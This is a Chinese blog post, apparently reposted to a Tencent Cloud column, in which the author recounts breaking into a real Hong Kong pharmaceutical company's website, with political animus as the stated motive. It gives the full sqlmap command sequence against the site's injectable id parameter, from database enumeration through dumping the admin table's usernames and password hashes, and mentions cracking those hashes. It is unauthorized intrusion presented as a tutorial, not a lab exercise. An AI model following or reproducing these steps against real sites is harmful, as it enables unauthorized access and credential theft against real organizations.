前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【实战XOX】测试中国香港某药业注入漏洞

【实战XOX】测试中国香港某药业注入漏洞

作者头像
天钧
发布2019-11-11 18:31:16
3.2K0
发布2019-11-11 18:31:16
举报
文章被收录于专栏:渗透云笔记渗透云笔记

最近,废青要港独!!!

于是我随意的在网上找到了中国香港的一个药业网站,起先没什么,也只是看看。突然发现是存在漏洞的!!!

可以看得出id= 可能存在漏洞

加了一个单引号,页面报错,我也可以确定是存在注入漏洞的

看着样子,它可能不存在waf,因为并没有拦截我的单引号

这时候我们就得祭出神器sqlmap

开始测试我们的注入点

代码语言:javascript
复制
python sqlmap.py -u "http://www.xxx.com/case_view.php?id=128"

这是基本的判断是否存在注入的语句

可以很明确的知道,是存在注入漏洞的。

the back-end DBMS is MySQL

web application technology: Nginx, PHP, PHP 5.6.40

back-end DBMS: MySQL >= 5.0.12

这是详细的信息,既然是mysql数据库。那么接下来我们就得爆出他的数据库!!!因为mysql是有多个数据库的

python sqlmap.py -u "http://www.xxx.com/case_view.php?id=128" --dbs

执行这个命令== 等待一下即可

可以看见,只有两个数据库!出乎我意料的少。没事根据我的经验,账号密码肯定存在ajyy这个数据库里面

那么,我们就可以开始爆数据库里面的表的内容了

python sqlmap.py -u "http://www.xxx.com/case_view.php?id=128" --tables -D "ajyy"

回车执行

这一次的表有点多,我就不一一列举出来,但从表中 我看到了dy_admin这个表,所有可以推断这个表存在账号密码,于是 我们开始 下一步

python sqlmap.py -u "http://www.xxx.com/case_view.php?id=128" --columns -T "dy_admin" -D "ajyy"

开始执行

果然不出我所料,看到username和password,我激动了

因为字段知道了,接下来就是最后一步了

python sqlmap.py -u "http://www.xxx.com/case_view.php?id=128" --dump -C "username,password" -T "dy_admin" -D "ajyy"

回车执行

很成功的发现了账号密码,不过密码有着md5的加密 ,于是我用了somd5去解密

成功的知道了密码 ,这里我就不发出来,保护网站的隐私

这篇文章就到这里 ,不够精彩 ,下篇再见

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-11-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 渗透云笔记 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
云数据库 MySQL
腾讯云数据库 MySQL(TencentDB for MySQL)为用户提供安全可靠,性能卓越、易于维护的企业级云数据库服务。其具备6大企业级特性,包括企业级定制内核、企业级高可用、企业级高可靠、企业级安全、企业级扩展以及企业级智能运维。通过使用腾讯云数据库 MySQL,可实现分钟级别的数据库部署、弹性扩展以及全自动化的运维管理,不仅经济实惠,而且稳定可靠,易于运维。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档